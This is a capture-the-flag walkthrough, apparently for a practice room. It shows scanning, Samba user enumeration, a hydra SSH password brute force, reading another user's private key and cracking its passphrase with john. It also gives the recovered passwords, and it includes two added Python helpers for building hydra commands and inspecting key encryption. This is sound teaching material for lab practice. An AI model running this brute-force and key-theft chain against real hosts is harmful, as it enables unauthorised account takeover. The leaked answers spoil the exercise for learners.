Task 1. Web App Testing and Privilege Escalation
Deploy the machine and connect to our network
Start the machine and connect to the THM network using openvpn or the attack box.
Find the services exposed by the machine
# nmap -p- -A 10.10.204.61
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8080/tcp open http Apache Tomcat 9.0.7
Found 6 ports open.
What is the name of the hidden directory on the web server(enter name without /)?
For this we use gobuster in dir mode with the DirBuster directory-list-2.3-medium wordlist.
# gobuster dir -u http://10.10.204.61 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
The scan returned two entries; /server-status is Apache's status handler (403 for us) and /development is the hidden directory the question asks for.
/development (Status: 301) [Size: 316] [--> http://10.10.20.44/development/]
/server-status (Status: 403) [Size: 299]
User brute-forcing to find the username & password
We could point hydra at SSH with both a username list and a password list, but that multiplies the search space. Since the Samba ports are exposed, we first enumerate the Samba server with enum4linux to obtain valid usernames; a known username turns a blind brute force into a password-only attack.
Enum4linux is a tool for enumerating information from Windows and Samba systems. It attempts to offer similar functionality to enum.exe, formerly available from www.bindview.com.
It is written in Perl and is basically a wrapper around the Samba tools smbclient, rpcclient, net and nmblookup.
# enum4linux -U -a 10.10.204.61
Share Enumeration on 10.10.204.61
IPC$ IPC IPC Service (Samba Server 4.3.11-Ubuntu)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
Found 2 usernames and 2 shares.
What is the username?
What is the password?
Since we now have a username (jan) and SSH is exposed on port 22, we can brute-force jan's password with Hydra and the rockyou wordlist. Hydra's ssh module warns that most sshd configurations limit the number of parallel sessions, so if you see spurious failures, reduce the task count with -t 4.
Hydra is a parallelized password cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely.
# hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.204.61 ssh
[ssh] host: 10.10.204.61 login: jan password: armando
1 of 1 target successfully completed, 1 valid password found
Success, Hydra found the password
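The enumerate-then-brute-force chain above (enum4linux usernames fed into hydra) as an added example; this is not code from the original writeup. The enum4linux output is a constructed sample shaped like the page's, the host, wordlist and users-file paths are assumptions, and the hydra command is only rendered, never executed.

```python
"""Added example, not part of the original writeup: parse enum4linux's RID
cycling output into a user list and build the matching hydra command.
Sample output, host and file paths below are constructed/assumed."""

import re
import shlex

# Constructed sample shaped like the enum4linux -U output on the page. It
# includes a repeated RID (enum4linux re-prints RIDs it retries) and a
# Unix Group line (SID S-1-22-2) that must not be mistaken for a user.
SAMPLE_ENUM4LINUX = """\
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\\kay (Local User)
S-1-22-1-1001 Unix User\\jan (Local User)
S-1-22-1-1000 Unix User\\kay (Local User)
S-1-22-2-1000 Unix Group\\kay (Local Group)
"""

# S-1-22-1-<rid> is the Samba SID prefix for local Unix users.
USER_LINE = re.compile(r"^(S-1-22-1-(\d+))\s+Unix User\\(\S+)\s+\(Local User\)", re.M)


def extract_unix_users(text):
    """Map RID -> username for every Unix User line, dropping duplicates and
    group lines. Sorted by RID so the resulting list is stable between runs."""
    users = {}
    for _sid, rid, name in USER_LINE.findall(text):
        users[int(rid)] = name
    return dict(sorted(users.items()))


def hydra_ssh_command(users, wordlist, host, users_file="users.txt", tasks=4):
    """Render the hydra invocation as an argv list. tasks=4 is deliberate:
    hydra's ssh module warns that most sshd configurations limit parallel
    sessions, and more tasks give spurious misses rather than faster results.
    A single user uses -l; several users are read from users_file via -L."""
    if len(users) == 1:
        target_args = ["-l", users[0]]
    else:
        target_args = ["-L", users_file]
    return ["hydra", *target_args, "-P", wordlist, "-t", str(tasks), host, "ssh"]


if __name__ == "__main__":
    users = extract_unix_users(SAMPLE_ENUM4LINUX)
    print("users by RID:", users)
    names = list(users.values())
    with open("users.txt", "w") as fh:          # assumed output path for -L
        fh.write("\n".join(names) + "\n")
    cmd = hydra_ssh_command(names, "/usr/share/wordlists/rockyou.txt", "10.10.204.61")
    print("would run:", shlex.join(cmd))
```

The RID-keyed dictionary is worth keeping rather than a bare name list: RIDs 1000 and 1001 tell you the account creation order on the box, which often matches the order in which a pentester should try them (the first local account is usually the administrator's own).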
Answer 6. armando
Question 7. What service do you use to access the server(answer in abbreviation in all caps)?
From our initial nmap scan we know that port 22 (SSH) is open, so we connect with Secure Shell as jan using the password armando.
# ssh jan@10.10.204.61
Enter the password and we are in.
Enumerate the machine to find any vectors for privilege escalation
Now that we have a shell as jan, we can automate the privilege-escalation enumeration with the LinPEAS script.
LinPEAS is a script that searches for possible paths to escalate privileges on Linux/Unix*/MacOS hosts. The checks it performs are explained on book.hacktricks.xyz.
So let’s get the script and copy it over to the server using jan’s credentials.
# git clone https://github.com/carlospolop/PEASS-ng.git
Navigate to the directory containing the linpeas.sh (PEASS-ng/linPEAS/linpeas.sh)
# scp linpeas.sh jan@10.10.204.61:/tmp
Once the transfer is complete, make the script executable and run it on the target. This takes some time, so be patient.
The script reports a lot of interesting files, but the most valuable finding is that kay's SSH private key is readable by our user.
What is the name of the other user you found(all lower case)?
We got that from question 4 (enum4linux).
If you have found another user, what can you do with this information?
From the linpeas output we can see that kay's SSH private key is readable, so we will use it to log in as kay and look for the final password.
The private key is at /home/kay/.ssh/id_rsa.
What is the final password you obtain?
To log in with kay's private key you also need its passphrase, which we don't know, since the key is passphrase-protected. Let's first copy the key to our own machine.
$ cat /home/kay/.ssh/id_rsa
Create a file for the key on the local machine:
# nano /tmp/id_kay
Paste the output into that file, keeping the BEGIN and END lines intact.
Since we have the encrypted private key, we can try to recover its passphrase offline with the John the Ripper suite.
John the Ripper is an open source password security auditing and password recovery tool available for many operating systems.
ssh2john is part of the John the Ripper suite. It is a script that converts an SSH private key (RSA, DSA, EC or OpenSSH format) into John's hash format so that the passphrase can be cracked with john.
# /usr/share/john/ssh2john.py /tmp/id_kay > /tmp/s2j_kay
# john --wordlist=/usr/share/wordlists/rockyou.txt /tmp/s2j_kay
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press ‘q’ or Ctrl-C to abort, almost any other key for status
Warning: Only 2 candidates left, minimum 8 needed for performance.
1g 0:00:00:04 DONE (2021-09-07 14:26) 0.2500g/s 3585Kp/s 3585Kc/s 3585KC/s a6_123..*7¡Vamos!
Success: john recovered the passphrase beeswax (john --show /tmp/s2j_kay prints it again if it scrolled past). Note the warning above that this format can emit false positives, so the real check is unlocking the key. Restrict the key file to owner-only permissions first, because ssh refuses to use a world-readable key, then log in as kay with the key and passphrase.
Enter the passphrase and we are in. Now let's have a look at the pass.bak file in kay's home directory.
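Before handing a key to ssh2john it helps to know what you are dealing with: whether the key is encrypted at all, whether it uses the legacy PEM container (Proc-Type and DEK-Info headers) or the newer openssh-key-v1 container, and in the latter case which cipher and KDF protect it, because the bcrypt round count sets the cracking cost. The following inspector covers the passphrase-protected key discussed above and the cracking step; it is an added example, not code from the writeup or from the John the Ripper project. It parses only the plaintext header fields of the two formats and never decrypts anything; both sample keys are constructed here with dummy key material.

```python
"""Added example, not from the original writeup: report the container format
and the visible encryption parameters of an SSH private key file.
Sample keys are constructed below; they contain no real key material."""

import base64
import struct

PEM_BEGIN = "-----BEGIN "
PEM_END = "-----END "


def _pem_parts(text):
    """Split PEM armour into (label, headers, decoded body). Legacy keys carry
    RFC 1421 headers (Proc-Type, DEK-Info) before a blank line."""
    lines = [ln.strip() for ln in text.strip().splitlines()]
    if not lines or not lines[0].startswith(PEM_BEGIN):
        raise ValueError("not a PEM-armoured file")
    label = lines[0][len(PEM_BEGIN):].rstrip("-")
    headers, body = {}, []
    for ln in lines[1:]:
        if ln.startswith(PEM_END):
            break
        if ":" in ln and not body:          # base64 never contains ':'
            key, _, value = ln.partition(":")
            headers[key.strip()] = value.strip()
        elif ln:
            body.append(ln)
    return label, headers, base64.b64decode("".join(body))


def _ssh_string(buf, off):
    """Read one SSH wire-format string (uint32 length + bytes) at offset."""
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n


def inspect_key(text):
    """Return format, cipher and KDF details readable without the passphrase."""
    label, headers, blob = _pem_parts(text)
    if label == "OPENSSH PRIVATE KEY":
        magic = b"openssh-key-v1\x00"
        if not blob.startswith(magic):
            raise ValueError("bad openssh-key-v1 magic")
        off = len(magic)
        cipher, off = _ssh_string(blob, off)
        kdf, off = _ssh_string(blob, off)
        kdfopts, off = _ssh_string(blob, off)
        info = {"format": "openssh-key-v1", "cipher": cipher.decode(),
                "kdf": kdf.decode(), "encrypted": cipher != b"none"}
        if kdf == b"bcrypt":                # kdfoptions = string salt, uint32 rounds
            salt, o = _ssh_string(kdfopts, 0)
            (rounds,) = struct.unpack(">I", kdfopts[o:o + 4])
            info["bcrypt_rounds"] = rounds
            info["salt_len"] = len(salt)
        return info
    # Legacy PEM (BEGIN RSA/DSA/EC PRIVATE KEY): encryption is signalled by headers.
    encrypted = headers.get("Proc-Type") == "4,ENCRYPTED"
    info = {"format": "pem:" + label, "encrypted": encrypted}
    if encrypted:
        cipher, _, iv_hex = headers.get("DEK-Info", "").partition(",")
        info["cipher"], info["iv_hex"] = cipher, iv_hex
    return info


def _ssh_str(b):
    return struct.pack(">I", len(b)) + b


def constructed_openssh_key(cipher=b"aes256-ctr", kdf=b"bcrypt", rounds=16):
    """Constructed sample: a syntactically valid openssh-key-v1 header followed
    by dummy public/private sections. Only the header fields are meaningful."""
    kdfopts = _ssh_str(b"\x00" * 16) + struct.pack(">I", rounds) if kdf == b"bcrypt" else b""
    blob = (b"openssh-key-v1\x00" + _ssh_str(cipher) + _ssh_str(kdf) + _ssh_str(kdfopts)
            + struct.pack(">I", 1)              # number of keys
            + _ssh_str(b"dummy public key") + _ssh_str(b"dummy private section"))
    b64 = base64.b64encode(blob).decode()
    body = "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return "-----BEGIN OPENSSH PRIVATE KEY-----\n%s\n-----END OPENSSH PRIVATE KEY-----\n" % body


# Constructed sample in the legacy format: encrypted RSA key with RFC 1421
# headers and a dummy body (not a real key).
LEGACY_ENCRYPTED_PEM = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,0123456789ABCDEF0123456789ABCDEF

ZHVtbXkga2V5IGJvZHk=
-----END RSA PRIVATE KEY-----
"""


if __name__ == "__main__":
    for name, key in [("openssh, bcrypt", constructed_openssh_key()),
                      ("openssh, unencrypted", constructed_openssh_key(b"none", b"none")),
                      ("legacy PEM, encrypted", LEGACY_ENCRYPTED_PEM)]:
        print(name, "->", inspect_key(key))
```

If inspect_key reports encrypted=False, skip ssh2john and use the key directly. If it reports a bcrypt KDF with a high round count, expect john to run orders of magnitude slower than the legacy AES-CBC case shown above, which has no KDF stretching beyond a single MD5 derivation.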
$ cat pass.bak